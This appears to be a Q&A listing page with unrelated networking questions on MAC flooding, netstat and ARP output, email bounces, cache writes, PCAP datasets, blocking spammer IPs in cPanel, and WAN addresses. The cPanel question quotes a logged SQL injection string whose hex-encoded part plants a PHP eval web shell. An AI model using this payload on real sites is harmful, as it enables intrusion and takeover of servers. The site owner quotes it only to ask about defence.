When MAC flooding, why would an attacker specify IP addresses and/or TCP ports?

I’m specifically referring to the macof tool (part of the dsniff package).

As I understand it, MAC flooding is meant to overload a switch’s CAM table, which maps MAC addresses to switch ports.

Where does specifying IP addresses and/or TCP ports fit into this?

Does doing so allow an attacker to bypass a Layer 3 switch’s filters, ones that filter traffic based on IP addresses and/or TCP ports?

What’s exactly my router querying on these addresses?

I’m trying to understand how my router works so I’m analyzing a couple of outputs (I logged in through SSH). I get these lines when trying netstat -a -e, and I’m not sure where do these addresses come from, or what they are exactly doing.

The xxx.xxx.xxx.xxx is the IP address that my router gets from the ISP router (WAN).

tcp  0 0 xxx.xxx.xxx.xxx:50689 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50695 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35877 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35883 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35876 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50688 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED    tcp  0 0 xxx.xxx.xxx.xxx:50696 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50697 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  

Email sent to 2 addresses with shared same organization domain @123abc.com and one bounced back. Was it successfully delivered to the other address?

It is my first time asking questions, so my apologies if there is any mistakes. I sent an email to 2 addresses (2 different departments in same organization with shared @123abc.com), one bounced back from mailer-daemon@googlemail.com due to ‘address not found’. I later found out it was a generated email address. Could someone please tell me if my email was successfully delivered to the other ‘good’ address (the other department)? Thank you very much for your great help in advance.

Is it normal to see two different IP addresses in the arp table when you run the arp -a check?

Long story short I noticed that there are two different IP addresses in the ARP table when I ran the arp check. I suspect my computer might have been compromised because when I ran similar check on my other computer it only returns one IP address instead of two. I’m not running any VPN or anything if it would clear any misunderstanding, it’s why I’m puzzled by this.

Why certain sites don’t send newsletters to “anonymous” mail addresses?

I use an “anonymous” mail address (cock.li provider in my case). I have found that mainstream news sites in particular don’t send their newsletters to such an addresses. It looks like the domains blacklisted.

What is the reason? I can understand that they don’t want you writing comments from anonymous mail addresses, but passive reading of a newsletter is also prohibited?

Why this behavior? Why this behavior only with traditional mainstream news?

These newsletters usually have a lot of advertising and tracking, why they don’t wish to deliver them to “anonymous” addresses?

How does a cache handle overwriting between 2 addresses in the same block?

Consider a byte-addressable cache with block size 16 bytes, bytes 0-15 form one block. First I write an int(let’s say 7) to address 0, so now bytes 0-3 contain the int 7. Now if I try to write another int(9) to address 2, then how does the cache handle this? Also if i try to read from byte 1, what effect does that have?

The lectures I’m watching suggest treating a block as the atomic unit in a cache, because keeping track of all the unwritten and written bytes will be a resource heavy task. So how will the above situation pan out? Will every block contain only 1 instance of data, with every write beginning from byte 0? because that is the only possible solution i can think of.

Publicly Available PCAP dumps that associate IP addresses with Operating System?

I am currently working on a machine learning module to detect Operating Systems based on existing packet traffic in pcap file format. So far, I have generated some traffic of popular Operating Systems available. However, this process is very tedious.

I would like to know if there is any publicly available pcap files that associates data generated from a particular Operating System (e.g. pcap file that have a lot of traffic from Windows XP). I am aware that there are other similar questions asked regarding publicly available pcap files, however none of them seem to be focused on Operating Systems.

Thank you.

cPanel deny IP Addresses of spammers

I have a drupal 7 site, but this question is a more generic one. In the logs I’m seeing regular “attacks” to access protected resources. So attackers are just trying. I’m starting to see more sophisticated attacks such as :


and with a referrer:

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} 

When I’m checking the ip addresses of these attacks 98% they are already registered as spam in the stopforumspam database.

Is there a way to have a list or an api at cPanel level not to have to have to deny each ip address manually.

My question is about cPanel not drupal, since I believe it is better to block them at a higher level even before reaching drupal.

In drupal I have a stopforumspam module but this is used to deny registration, which does not prevent attacks such as the one above.

What I need is to be able to block these attacks from known spammer Ips without having to add each ip address manualy in the deny Ip address list in cPanel.

Many thanks

Does anyone know the answer the following questions on converting logical – physical addresses

Due to the unforeseen pandemic, I am unable to speak to my tutor about the following question. I have emailed him, but I have not had an answer for weeks. Can someone please enlighten me.

Image and question to be answered below. Please provide an explanation, as I am struggling to find an answer:

enter image description here

Why two IP WAN addresses? [closed]

I have a ZTE 4G LTE + modem equipped with a specific phone card and when I connect to the internet and obtain my IP address, I find 2 different ones: One belonging to the Telephone Provider, the other identified as the host. What is the cause of the presence of an additional IP on a natted network?